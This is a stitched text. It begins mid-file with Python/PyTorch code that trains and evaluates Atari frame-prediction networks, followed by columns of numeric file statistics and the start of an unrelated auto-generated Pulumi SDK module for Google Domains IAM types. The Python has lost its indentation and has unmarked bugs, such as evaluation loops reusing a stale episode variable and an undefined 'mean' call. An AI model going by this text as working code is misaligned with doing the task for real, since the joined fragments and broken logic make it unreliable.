first_visit = 1
test_indices = range(test_episodes, episodes)
for ep in test_indices:
frames, actions = load_episode(game, ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
if first_visit:
all_frames = torch.from_numpy(frames)
all_actions = torch.from_numpy(actions)
all_targets = torch.from_numpy(targets)
first_visit = 0
else:
all_frames = torch.cat((all_frames,torch.from_numpy(frames)))
all_actions = torch.cat((all_actions,torch.from_numpy(actions)))
all_targets = torch.cat((all_targets,torch.from_numpy(targets)))
training_set = torch.utils.data.TensorDataset(all_frames, all_actions, all_targets)
training_loader = torch.utils.data.DataLoader(training_set, batch_size=batchSize, shuffle=True,
num_workers=12, pin_memory=True)
f = open(gameDir+'/results.txt', 'a')
for epoch in range(0,numEpoch):
print("Starting Epoch: " + str(epoch))
np.random.shuffle(indices_train)
for x, a, y in training_loader:
loss = net.fit(pre_process(x.numpy()), a.numpy(), pre_process(y.numpy()))
if iteration % 100 == 0:
logger.info('Iteration %d, loss %f' % (iteration, loss))
iteration += 1
#Save model every epoch
losses = []
ep_to_print = np.random.choice(test_indices)
ep_count = 0
for x, a, y in tqdm(training_loader):
x = x.numpy()
a = a.numpy()
y = y.numpy()
losses.append(net.evaluate(pre_process(x), a, pre_process(y)))
if test_indices[ep_count] == ep_to_print:
y_ = post_process(net.predict(pre_process(x), a))
torchvision.utils.save_image(torch.from_numpy(x[0:32,9:12]), sampleDir+'/%s-%02d-input.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y[0:32]), sampleDir+'/%s-%02d-truth.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y_[0:32]), sampleDir+'/%s-%02d.png' % (game, epoch))
ep_count+=1
logger.info('Epoch %d, test loss %f' % (epoch, np.mean(losses)))
f.write('Epoch: ' + str(epoch)+ ', test loss: ' + str(np.mean(losses))+ '\n')
torch.save(net.state_dict(), modelDir+'/acvp-%s-%02d.bin' % (game, epoch))
f.close()
def trainMultiGame(game, numEpoch, batchSize, num_actions):
#env = gym.make(game)
#num_actions = env.action_space.n
#num_actions = 6
net = Network(num_actions)
#'BowlingNoFrameskip-v4'
#'SeaquestNoFrameskip-v4'
#'SpaceInvadersNoFrameskip-v4'
#Look for checkpoint
gameDir = 'resultsNew2/'+game+str(num_actions)
print(gameDir)
sampleDir = gameDir+ '/samples'
modelDir = gameDir+'/models'
pretrained = modelDir+'/acvp-'+game+'-00.bin'
if os.path.exists(pretrained):
net.load_state_dict(torch.load(pretrained))
#net.load_state_dict(torch.load('acvp-MultiPB-00.bin'))
#with open('%s/dataset/%s/meta.bin' % (PREFIX, 'PongBowl'), 'rb') as f:
#meta = pickle.load(f)
#episodes = meta['episodes']
#mean_obs = meta['mean_obs']
with open('%s/dataset/BowlingNoFrameskip-v4/meta.bin' % (PREFIX), 'rb') as f:
meta = pickle.load(f)
#episodes = meta['episodes']
mean_obsB = meta['mean_obs']
with open('%s/dataset/PongNoFrameskip-v4/meta.bin' % (PREFIX), 'rb') as f:
meta = pickle.load(f)
#episodes = meta['episodes']
mean_obsP = meta['mean_obs']
mean_obs = (mean_obsB + mean_obsP)/2
def pre_process(x,mean_obs):
if x.shape[1] == 12:
return (x - np.vstack([mean_obs] * 4)) / 255.0
elif x.shape[1] == 3:
return (x - mean_obs) / 255.0
else:
assert False
def post_process(y,mean_obs):
return (y * 255 + mean_obs).astype(np.uint8)
# testNum = episodes*dataPortion*(1-trainingSize)
# trainNum = episodes*dataPortion*trainingSize
# e = np.arange(episodes)
# testIdx = int(episodes/testNum)
# test_episodes = e[testIdx::testIdx]
# trainIdx = int((episodes-testNum)/trainNum)
# train_episodes = np.setdiff1d(e, test_episodes)[0::trainIdx]
train_episodes = np.concatenate((np.arange(144),np.arange(161,349)))
test_episodes = np.concatenate((np.arange(144,161),np.arange(349,373)))
#train_episodes = np.concatenate((np.arange(146),np.arange(163,350)))
#test_episodes = np.concatenate((np.arange(146,163),np.arange(350,375)))
np.random.shuffle(test_episodes)
np.random.shuffle(train_episodes)
iteration = 0
mkdir(gameDir)
mkdir(sampleDir)
mkdir(modelDir)
f = open(gameDir+'/results.txt', 'a')
for epoch in range(0,numEpoch):
print("Starting Epoch: " + str(epoch))
np.random.shuffle(train_episodes)
for ep in train_episodes:
if (ep > 160):
m = mean_obs
else:
m = mean_obs
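# NOTE: both branches above assign the same combined mean_obs; the per-game means
# (mean_obsP, mean_obsB) computed earlier are not used here.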
frames, actions = load_episode('PongBowl2', ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
batcher = Batcher(batchSize, [frames, actions, targets])
batcher.shuffle()
while not batcher.end():
x, a, y = batcher.next_batch()
loss = net.fit(pre_process(x,m), a, pre_process(y,m))
if iteration % 100 == 0:
logger.info('Iteration %d, loss %f' % (iteration, loss))
iteration += 1
tep = np.random.randint(161,349)
frames, actions = load_episode('PongBowl2', tep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
batcher = Batcher(batchSize, [frames, actions, targets])
batcher.shuffle()
b_count = 0
while not batcher.end():
x, a, y = batcher.next_batch()
loss = net.fit(pre_process(x,m), a, pre_process(y,m))
if b_count >20:
break
b_count += 1
tep = np.random.randint(161,349)
frames, actions = load_episode('PongBowl2', tep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
batcher = Batcher(batchSize, [frames, actions, targets])
batcher.shuffle()
b_count = 0
while not batcher.end():
x, a, y = batcher.next_batch()
loss = net.fit(pre_process(x,m), a, pre_process(y,m))
if b_count >20:
break
b_count += 1
#Save model every epoch
losses = []
ep_to_print = np.random.choice(test_episodes)
for test_ep in tqdm(test_episodes):
if (ep > 160):
m = mean_obs
else:
m = mean_obs
frames, actions = load_episode('PongBowl2', test_ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
test_batcher = Batcher(batchSize, [frames, actions, targets])
while not test_batcher.end():
x, a, y = test_batcher.next_batch()
losses.append(net.evaluate(pre_process(x,m), a, pre_process(y,m)))
if test_ep == ep_to_print:
test_batcher.reset()
x, a, y = test_batcher.next_batch()
y_ = post_process(net.predict(pre_process(x,m), a),m)
torchvision.utils.save_image(torch.from_numpy(x[0:32,9:12]), sampleDir+'/%s-%02d-input.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y[0:32]), sampleDir+'/%s-%02d-truth.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y_[0:32]), sampleDir+'/%s-%02d.png' % (game, epoch))
logger.info('Epoch %d, test loss %f' % (epoch, mean(losses)))
f.write('Epoch: ' + str(epoch)+ ', test loss: ' + str(mean(losses))+ '\n')
torch.save(net.state_dict(), modelDir+'/acvp-%s-%02d.bin' % (game, epoch))
f.close()
def testMultiGame2(game, numEpoch, batchSize, num_actions):
#env = gym.make(game)
#num_actions = env.action_space.n
#num_actions = 6
net = Network(num_actions)
#'BowlingNoFrameskip-v4'
#'SeaquestNoFrameskip-v4'
#'SpaceInvadersNoFrameskip-v4'
#Look for checkpoint
gameDir = 'resultsNew2/'+game+str(num_actions)+'Pongtest'
print(gameDir)
sampleDir = gameDir+ '/samples'
modelDir = gameDir+'/models'
pretrained = 'resultsNew2/'+game+str(num_actions)+'/models/acvp-'+game+'-09.bin'
if os.path.exists(pretrained):
net.load_state_dict(torch.load(pretrained))
print("Loaded: " + pretrained)
#net.load_state_dict(torch.load('acvp-MultiPB-00.bin'))
#with open('%s/dataset/%s/meta.bin' % (PREFIX, 'PongBowl'), 'rb') as f:
#meta = pickle.load(f)
#episodes = meta['episodes']
#mean_obs = meta['mean_obs']
with open('%s/dataset/BowlingNoFrameskip-v4/meta.bin' % (PREFIX), 'rb') as f:
meta = pickle.load(f)
#episodes = meta['episodes']
mean_obsB = meta['mean_obs']
with open('%s/dataset/PongNoFrameskip-v4/meta.bin' % (PREFIX), 'rb') as f:
meta = pickle.load(f)
#episodes = meta['episodes']
mean_obsP = meta['mean_obs']
mean_obs = (mean_obsB + mean_obsP)/2
def pre_process(x,mean_obs):
if x.shape[1] == 12:
return (x - np.vstack([mean_obs] * 4)) / 255.0
elif x.shape[1] == 3:
return (x - mean_obs) / 255.0
else:
assert False
def post_process(y,mean_obs):
return (y * 255 + mean_obs).astype(np.uint8)
# testNum = episodes*dataPortion*(1-trainingSize)
# trainNum = episodes*dataPortion*trainingSize
# e = np.arange(episodes)
# testIdx = int(episodes/testNum)
# test_episodes = e[testIdx::testIdx]
# trainIdx = int((episodes-testNum)/trainNum)
# train_episodes = np.setdiff1d(e, test_episodes)[0::trainIdx]
train_episodes = np.concatenate((np.arange(144),np.arange(161,349)))
#test_episodes = np.concatenate((np.arange(144,161),np.arange(349,373)))
#train_episodes = np.concatenate((np.arange(146),np.arange(163,350)))
#test_episodes = np.concatenate((np.arange(146,163),np.arange(350,375)))
#np.random.shuffle(test_episodes)
np.random.shuffle(train_episodes)
iteration = 0
mkdir(gameDir)
mkdir(sampleDir)
mkdir(modelDir)
test_episodes = np.arange(349,373)
np.random.shuffle(test_episodes)
f = open(gameDir+'/results.txt', 'a')
for epoch in range(0,numEpoch):
# print("Starting Epoch: " + str(epoch))
# np.random.shuffle(train_episodes)
# for ep in train_episodes:
# if (ep > 160):
# m = mean_obs
# else:
# m = mean_obs
# frames, actions = load_episode('PongBowl2', ep, num_actions)
# frames, actions, targets = extend_frames(frames, actions)
# batcher = Batcher(batchSize, [frames, actions, targets])
# batcher.shuffle()
# while not batcher.end():
# x, a, y = batcher.next_batch()
# loss = net.fit(pre_process(x,m), a, pre_process(y,m))
# if iteration % 100 == 0:
# logger.info('Iteration %d, loss %f' % (iteration, loss))
# iteration += 1
# tep = np.random.randint(161,349)
# frames, actions = load_episode('PongBowl2', tep, num_actions)
# frames, actions, targets = extend_frames(frames, actions)
# batcher = Batcher(batchSize, [frames, actions, targets])
# batcher.shuffle()
# b_count = 0
# while not batcher.end():
# x, a, y = batcher.next_batch()
# loss = net.fit(pre_process(x,m), a, pre_process(y,m))
# if b_count >20:
# break
# b_count += 1
# tep = np.random.randint(161,349)
# frames, actions = load_episode('PongBowl2', tep, num_actions)
# frames, actions, targets = extend_frames(frames, actions)
# batcher = Batcher(batchSize, [frames, actions, targets])
# batcher.shuffle()
# b_count = 0
# while not batcher.end():
# x, a, y = batcher.next_batch()
# loss = net.fit(pre_process(x,m), a, pre_process(y,m))
# if b_count >20:
# break
# b_count += 1
#Save model every epoch
losses = []
ep_to_print = np.random.choice(test_episodes)
for test_ep in tqdm(test_episodes):
if (test_ep > 160):
m = mean_obs
else:
m = mean_obs
frames, actions = load_episode('PongBowl2', test_ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
test_batcher = Batcher(batchSize, [frames, actions, targets])
while not test_batcher.end():
x, a, y = test_batcher.next_batch()
losses.append(net.evaluate(pre_process(x,m), a, pre_process(y,m)))
if test_ep == ep_to_print:
test_batcher.reset()
x, a, y = test_batcher.next_batch()
y_ = post_process(net.predict(pre_process(x,m), a),m)
torchvision.utils.save_image(torch.from_numpy(x[0:32,9:12]), sampleDir+'/%s-%02d-input.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y[0:32]), sampleDir+'/%s-%02d-truth.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y_[0:32]), sampleDir+'/%s-%02d.png' % (game, epoch))
logger.info('Epoch %d, test loss %f' % (epoch, mean(losses)))
f.write('Epoch: ' + str(epoch)+ ', test loss: ' + str(mean(losses))+ '\n')
#torch.save(net.state_dict(), modelDir+'/acvp-%s-%02d.bin' % (game, epoch))
f.close()
def trainThreeGame(game, numEpoch, batchSize, num_actions):
#env = gym.make(game)
#num_actions = env.action_space.n
#num_actions = 6
net = Network(num_actions)
#'BowlingNoFrameskip-v4'
#'SeaquestNoFrameskip-v4'
#'SpaceInvadersNoFrameskip-v4'
#Look for checkpoint
gameDir = 'resultsNew2/'+game+str(num_actions)
print(gameDir)
sampleDir = gameDir+ '/samples'
modelDir = gameDir+'/models'
#pretrained = modelDir+'/acvp-'+game+'-00.bin'
#if os.path.exists(pretrained):
#net.load_state_dict(torch.load(pretrained))
#net.load_state_dict(torch.load('acvp-MultiPB-00.bin'))
#with open('%s/dataset/%s/meta.bin' % (PREFIX, 'PongBowl'), 'rb') as f:
#meta = pickle.load(f)
#episodes = meta['episodes']
#mean_obs = meta['mean_obs']
with open('%s/dataset/BowlingNoFrameskip-v4/meta.bin' % (PREFIX), 'rb') as f:
meta = pickle.load(f)
#episodes = meta['episodes']
mean_obsB = meta['mean_obs']
with open('%s/dataset/PongNoFrameskip-v4/meta.bin' % (PREFIX), 'rb') as f:
meta = pickle.load(f)
#episodes = meta['episodes']
mean_obsP = meta['mean_obs']
with open('%s/dataset/QbertNoFrameskip-v4/meta.bin' % (PREFIX), 'rb') as f:
meta = pickle.load(f)
#episodes = meta['episodes']
mean_obsQ = meta['mean_obs']
mean_obs = (mean_obsB + mean_obsP + mean_obsQ)/3
def pre_process(x,mean_obs):
if x.shape[1] == 12:
return (x - np.vstack([mean_obs] * 4)) / 255.0
elif x.shape[1] == 3:
return (x - mean_obs) / 255.0
else:
assert False
def post_process(y,mean_obs):
return (y * 255 + mean_obs).astype(np.uint8)
# testNum = episodes*dataPortion*(1-trainingSize)
# trainNum = episodes*dataPortion*trainingSize
# e = np.arange(episodes)
# testIdx = int(episodes/testNum)
# test_episodes = e[testIdx::testIdx]
# trainIdx = int((episodes-testNum)/trainNum)
# train_episodes = np.setdiff1d(e, test_episodes)[0::trainIdx]
train_episodes = np.concatenate((np.arange(144),np.arange(161,349)))
test_episodes = np.concatenate((np.arange(144,161),np.arange(349,373)))
#train_episodes = np.concatenate((np.arange(146),np.arange(163,350)))
#test_episodes = np.concatenate((np.arange(146,163),np.arange(350,375)))
np.random.shuffle(test_episodes)
np.random.shuffle(train_episodes)
iteration = 0
mkdir(gameDir)
mkdir(sampleDir)
mkdir(modelDir)
f = open(gameDir+'/results.txt', 'a')
for epoch in range(0,numEpoch):
print("Starting Epoch: " + str(epoch))
np.random.shuffle(train_episodes)
for ep in train_episodes:
if (ep > 160):
m = mean_obs
else:
m = mean_obs
frames, actions = load_episode('PongBowl2', ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
batcher = Batcher(batchSize, [frames, actions, targets])
batcher.shuffle()
while not batcher.end():
x, a, y = batcher.next_batch()
loss = net.fit(pre_process(x,m), a, pre_process(y,m))
if iteration % 100 == 0:
logger.info('Iteration %d, loss %f' % (iteration, loss))
iteration += 1
tep = np.random.randint(161,349)
frames, actions = load_episode('PongBowl2', tep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
batcher = Batcher(batchSize, [frames, actions, targets])
batcher.shuffle()
b_count = 0
while not batcher.end():
x, a, y = batcher.next_batch()
loss = net.fit(pre_process(x,m), a, pre_process(y,m))
if b_count >20:
break
b_count += 1
tep = np.random.randint(161,349)
frames, actions = load_episode('PongBowl2', tep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
batcher = Batcher(batchSize, [frames, actions, targets])
batcher.shuffle()
b_count = 0
while not batcher.end():
x, a, y = batcher.next_batch()
loss = net.fit(pre_process(x,m), a, pre_process(y,m))
if b_count >20:
break
b_count += 1
#Save model every epoch
losses = []
ep_to_print = np.random.choice(test_episodes)
for test_ep in tqdm(test_episodes):
if (ep > 160):
m = mean_obs
else:
m = mean_obs
frames, actions = load_episode('PongBowl2', test_ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
test_batcher = Batcher(batchSize, [frames, actions, targets])
while not test_batcher.end():
x, a, y = test_batcher.next_batch()
losses.append(net.evaluate(pre_process(x,m), a, pre_process(y,m)))
if test_ep == ep_to_print:
test_batcher.reset()
x, a, y = test_batcher.next_batch()
y_ = post_process(net.predict(pre_process(x,m), a),m)
torchvision.utils.save_image(torch.from_numpy(x[0:32,9:12]), sampleDir+'/%s-%02d-input.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y[0:32]), sampleDir+'/%s-%02d-truth.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y_[0:32]), sampleDir+'/%s-%02d.png' % (game, epoch))
logger.info('Epoch %d, test loss %f' % (epoch, mean(losses)))
f.write('Epoch: ' + str(epoch)+ ', test loss: ' + str(mean(losses))+ '\n')
torch.save(net.state_dict(), modelDir+'/acvp-%s-%02d.bin' % (game, epoch))
f.close()
def testMultiGame(game):
num_actions = 6
net = Network(num_actions)
#Look for checkpoint
gameDir = 'resultsNew2/'+game+str(num_actions)
print(gameDir)
sampleDir = gameDir+ '/samples'
modelDir = gameDir+'/models'
#gameDir = 'results/SItest/'+game
#print(gameDir)
#pretrained = modelDir+'/acvp-'+game+str(trainingSize)+'pre.bin'
#pretrained = '/home/matias/Documents/fall2019/rl/DeepRL_pytorch/results/SpaceInvadersNoFrameskip-v42518/models/acvp-SpaceInvadersNoFrameskip-v4-09.bin'
#if os.path.exists(pretrained):
#net.load_state_dict(torch.load(pretrained))
net.load_state_dict(torch.load('/home/matias/Documents/fall2019/rl/DeepRL_pytorch/results/QbertNoFrameskip-v412small/models/acvp-QbertNoFrameskip-v4-09.bin'))
with open('%s/dataset/%s/meta.bin' % (PREFIX, game), 'rb') as f:
meta = pickle.load(f)
episodes = meta['episodes']
mean_obs = meta['mean_obs']
def pre_process(x):
if x.shape[1] == 12:
return (x - np.vstack([mean_obs] * 4)) / 255.0
elif x.shape[1] == 3:
return (x - mean_obs) / 255.0
else:
assert False
def post_process(y):
return (y * 255 + mean_obs).astype(np.uint8)
mkdir(gameDir)
test_ep = 42
frames, actions = load_episode(game, test_ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
test_batcher = Batcher(32, [frames, actions, targets])
count = 0
losses = []
while not test_batcher.end():
x, a, y = test_batcher.next_batch()
y_ = post_process(net.predict(pre_process(x), a))
torchvision.utils.save_image(torch.from_numpy(x[0:32,9:12]), gameDir+'/%s-%02d-input.png' % (game, count))
torchvision.utils.save_image(torch.from_numpy(y[0:32]), gameDir+'/%s-%02d-truth.png' % (game, count))
torchvision.utils.save_image(torch.from_numpy(y_[0:32]), gameDir+'/%s-%02d.png' % (game, count))
count += 1
def testSingleGame(game, numEpoch, batchSize, trainingSize, num_actions):
#env = gym.make(game)
#num_actions = env.action_space.n
#num_actions = 18
net = Network(num_actions)
#Look for checkpoint
#pretrained = modelDir+'/acvp-'+game+'-08.bin'
for x in trainingSize:
gameDir = 'tests/'+game+str(x)
print(gameDir)
sampleDir = gameDir+ '/samples'
pretrained = '/home/matias/Documents/fall2019/rl/DeepRL_pytorch/resultsNew2/MsPacmanNoFrameskip-v4'+str(x)+'/models/acvp-msPacmanNoFrameskip-v4-09.bin'
if os.path.exists(pretrained):
net.load_state_dict(torch.load(pretrained))
print("Grabbed Pretrained:" + pretrained)
#net.load_state_dict(torch.load('/home/matias/Documents/fall2019/rl/DeepRL_pytorch/results/MultiPB6/models/acvp-MultiPB-19.bin'))
with open('%s/dataset/%s/meta.bin' % (PREFIX, game), 'rb') as f:
meta = pickle.load(f)
episodes = meta['episodes']
mean_obs = meta['mean_obs']
def pre_process(x):
if x.shape[1] == 12:
return (x - np.vstack([mean_obs] * 4)) / 255.0
elif x.shape[1] == 3:
return (x - mean_obs) / 255.0
else:
assert False
def post_process(y):
return (y * 255 + mean_obs).astype(np.uint8)
#trainSplit = float(trainingSize/100)
#train_episodes = int(episodes * trainSplit)
#test_episodes = episodes - int(episodes *(1-trainSplit))
test_episodes = episodes - int(episodes *(1-0.89))
#indices_train = np.arange(train_episodes)
iteration = 0
mkdir(gameDir)
mkdir(sampleDir)
losses = []
#test_indices = range(test_episodes, episodes)
#ep_to_print = np.random.choice(test_indices)
#for test_ep in tqdm(test_indices):
test_ep = 39
frames, actions = load_episode(game, test_ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
test_batcher = Batcher(batchSize, [frames, actions, targets])
while not test_batcher.end():
x, a, y = test_batcher.next_batch()
losses.append(net.evaluate(pre_process(x), a, pre_process(y)))
#if test_ep == ep_to_print:
# test_batcher.reset()
# x, a, y = test_batcher.next_batch()
y_ = post_process(net.predict(pre_process(x), a))
#torchvision.utils.save_image(torch.from_numpy(x[0:32,9:12]), sampleDir+'/%s-%02d-input.png' % (game, iteration))
torchvision.utils.save_image(torch.from_numpy(y[0:32]), sampleDir+'/%s-%02d-truth.png' % (game, iteration))
torchvision.utils.save_image(torch.from_numpy(y_[0:32]), sampleDir+'/%s-%02d.png' % (game, iteration))
f = open(gameDir+ '/results.txt', 'a')
f.write('Iteration: ' + str(iteration)+ ', iter loss: ' + str(losses[iteration])+ '\n')
f.close()
iteration+=1
def testMGame():
#env = gym.make(game)
#num_actions = env.action_space.n
#num_actions = 18
#Look for checkpoint
#pretrained = modelDir+'/acvp-'+game+'-08.bin'
# with open('%s/dataset/%s/meta.bin' % (PREFIX, game), 'rb') as f:
# meta = pickle.load(f)
# episodes = meta['episodes']
# mean_obs = meta['mean_obs']
with open('%s/dataset/BowlingNoFrameskip-v4/meta.bin' % (PREFIX), 'rb') as f:
meta = pickle.load(f)
#episodes = meta['episodes']
mean_obsB = meta['mean_obs']
with open('%s/dataset/PongNoFrameskip-v4/meta.bin' % (PREFIX), 'rb') as f:
meta = pickle.load(f)
#episodes = meta['episodes']
mean_obsP = meta['mean_obs']
mean_obs = (mean_obsB + mean_obsP)/2
with open('%s/dataset/%s/meta.bin' % (PREFIX, 'BoxingNoFrameskip-v4'), 'rb') as f:
meta = pickle.load(f)
mean_obsBox = meta['mean_obs']
with open('%s/dataset/%s/meta.bin' % (PREFIX, 'QbertNoFrameskip-v4'), 'rb') as f:
meta = pickle.load(f)
mean_obsQ = meta['mean_obs']
with open('%s/dataset/%s/meta.bin' % (PREFIX, 'MsPacmanNoFrameskip-v4'), 'rb') as f:
meta = pickle.load(f)
mean_obsPac = meta['mean_obs']
diffBox = np.mean((mean_obsB-mean_obsBox)**2)
diffQ = np.mean((mean_obsB-mean_obsQ)**2)
diffPac = np.mean((mean_obsB-mean_obsPac)**2)
print(diffBox)
print(diffQ)
print(diffPac)
| 40.019743
| 162
| 0.587765
| 5,216
| 40,540
| 4.434241
| 0.066718
| 0.044965
| 0.032859
| 0.024861
| 0.852134
| 0.829262
| 0.821782
| 0.819361
| 0.798824
| 0.782913
| 0
| 0.032958
| 0.266527
| 40,540
| 1,012
| 163
| 40.059289
| 0.74488
| 0.179847
| 0
| 0.748899
| 0
| 0.001468
| 0.078205
| 0.028703
| 0
| 0
| 0
| 0
| 0.011747
| 1
| 0.048458
| false
| 0
| 0.023495
| 0.011747
| 0.117474
| 0.041116
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1e809eee645cbb6f050d2504e0c012c7e9cde4bb
| 53,531
|
py
|
Python
|
sdk/python/pulumi_google_native/domains/v1beta1/outputs.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 44
|
2021-04-18T23:00:48.000Z
|
2022-02-14T17:43:15.000Z
|
sdk/python/pulumi_google_native/domains/v1beta1/outputs.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 354
|
2021-04-16T16:48:39.000Z
|
2022-03-31T17:16:39.000Z
|
sdk/python/pulumi_google_native/domains/v1beta1/outputs.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 8
|
2021-04-24T17:46:51.000Z
|
2022-01-05T10:40:21.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
__all__ = [
'AuditConfigResponse',
'AuditLogConfigResponse',
'BindingResponse',
'ContactResponse',
'ContactSettingsResponse',
'CustomDnsResponse',
'DnsSettingsResponse',
'DsRecordResponse',
'ExprResponse',
'GlueRecordResponse',
'GoogleDomainsDnsResponse',
'ManagementSettingsResponse',
'PostalAddressResponse',
]
@pulumi.output_type
class AuditConfigResponse(dict):
"""
Specifies the audit configuration for a service. The configuration determines which permission types are logged, and what identities, if any, are exempted from logging. An AuditConfig must have one or more AuditLogConfigs. If there are AuditConfigs for both `allServices` and a specific service, the union of the two AuditConfigs is used for that service: the log_types specified in each AuditConfig are enabled, and the exempted_members in each AuditLogConfig are exempted. Example Policy with multiple AuditConfigs: { "audit_configs": [ { "service": "allServices", "audit_log_configs": [ { "log_type": "DATA_READ", "exempted_members": [ "user:jose@example.com" ] }, { "log_type": "DATA_WRITE" }, { "log_type": "ADMIN_READ" } ] }, { "service": "sampleservice.googleapis.com", "audit_log_configs": [ { "log_type": "DATA_READ" }, { "log_type": "DATA_WRITE", "exempted_members": [ "user:aliya@example.com" ] } ] } ] } For sampleservice, this policy enables DATA_READ, DATA_WRITE and ADMIN_READ logging. It also exempts jose@example.com from DATA_READ logging, and aliya@example.com from DATA_WRITE logging.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "auditLogConfigs":
suggest = "audit_log_configs"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in AuditConfigResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
AuditConfigResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
AuditConfigResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
audit_log_configs: Sequence['outputs.AuditLogConfigResponse'],
service: str):
"""
Specifies the audit configuration for a service. The configuration determines which permission types are logged, and what identities, if any, are exempted from logging. An AuditConfig must have one or more AuditLogConfigs. If there are AuditConfigs for both `allServices` and a specific service, the union of the two AuditConfigs is used for that service: the log_types specified in each AuditConfig are enabled, and the exempted_members in each AuditLogConfig are exempted. Example Policy with multiple AuditConfigs: { "audit_configs": [ { "service": "allServices", "audit_log_configs": [ { "log_type": "DATA_READ", "exempted_members": [ "user:jose@example.com" ] }, { "log_type": "DATA_WRITE" }, { "log_type": "ADMIN_READ" } ] }, { "service": "sampleservice.googleapis.com", "audit_log_configs": [ { "log_type": "DATA_READ" }, { "log_type": "DATA_WRITE", "exempted_members": [ "user:aliya@example.com" ] } ] } ] } For sampleservice, this policy enables DATA_READ, DATA_WRITE and ADMIN_READ logging. It also exempts jose@example.com from DATA_READ logging, and aliya@example.com from DATA_WRITE logging.
:param Sequence['AuditLogConfigResponse'] audit_log_configs: The configuration for logging of each type of permission.
:param str service: Specifies a service that will be enabled for audit logging. For example, `storage.googleapis.com`, `cloudsql.googleapis.com`. `allServices` is a special value that covers all services.
"""
pulumi.set(__self__, "audit_log_configs", audit_log_configs)
pulumi.set(__self__, "service", service)
@property
@pulumi.getter(name="auditLogConfigs")
def audit_log_configs(self) -> Sequence['outputs.AuditLogConfigResponse']:
"""
The configuration for logging of each type of permission.
"""
return pulumi.get(self, "audit_log_configs")
@property
@pulumi.getter
def service(self) -> str:
"""
Specifies a service that will be enabled for audit logging. For example, `storage.googleapis.com`, `cloudsql.googleapis.com`. `allServices` is a special value that covers all services.
"""
return pulumi.get(self, "service")
@pulumi.output_type
class AuditLogConfigResponse(dict):
"""
Provides the configuration for logging a type of permissions. Example: { "audit_log_configs": [ { "log_type": "DATA_READ", "exempted_members": [ "user:jose@example.com" ] }, { "log_type": "DATA_WRITE" } ] } This enables 'DATA_READ' and 'DATA_WRITE' logging, while exempting jose@example.com from DATA_READ logging.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "exemptedMembers":
suggest = "exempted_members"
elif key == "logType":
suggest = "log_type"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in AuditLogConfigResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
AuditLogConfigResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
AuditLogConfigResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
exempted_members: Sequence[str],
log_type: str):
"""
Provides the configuration for logging a type of permissions. Example: { "audit_log_configs": [ { "log_type": "DATA_READ", "exempted_members": [ "user:jose@example.com" ] }, { "log_type": "DATA_WRITE" } ] } This enables 'DATA_READ' and 'DATA_WRITE' logging, while exempting jose@example.com from DATA_READ logging.
:param Sequence[str] exempted_members: Specifies the identities that do not cause logging for this type of permission. Follows the same format of Binding.members.
:param str log_type: The log type that this config enables.
"""
pulumi.set(__self__, "exempted_members", exempted_members)
pulumi.set(__self__, "log_type", log_type)
@property
@pulumi.getter(name="exemptedMembers")
def exempted_members(self) -> Sequence[str]:
"""
Specifies the identities that do not cause logging for this type of permission. Follows the same format of Binding.members.
"""
return pulumi.get(self, "exempted_members")
@property
@pulumi.getter(name="logType")
def log_type(self) -> str:
"""
The log type that this config enables.
"""
return pulumi.get(self, "log_type")
@pulumi.output_type
class BindingResponse(dict):
"""
Associates `members`, or principals, with a `role`.
"""
def __init__(__self__, *,
condition: 'outputs.ExprResponse',
members: Sequence[str],
role: str):
"""
Associates `members`, or principals, with a `role`.
:param 'ExprResponse' condition: The condition that is associated with this binding. If the condition evaluates to `true`, then this binding applies to the current request. If the condition evaluates to `false`, then this binding does not apply to the current request. However, a different role binding might grant the same role to one or more of the principals in this binding. To learn which resources support conditions in their IAM policies, see the [IAM documentation](https://cloud.google.com/iam/help/conditions/resource-policies).
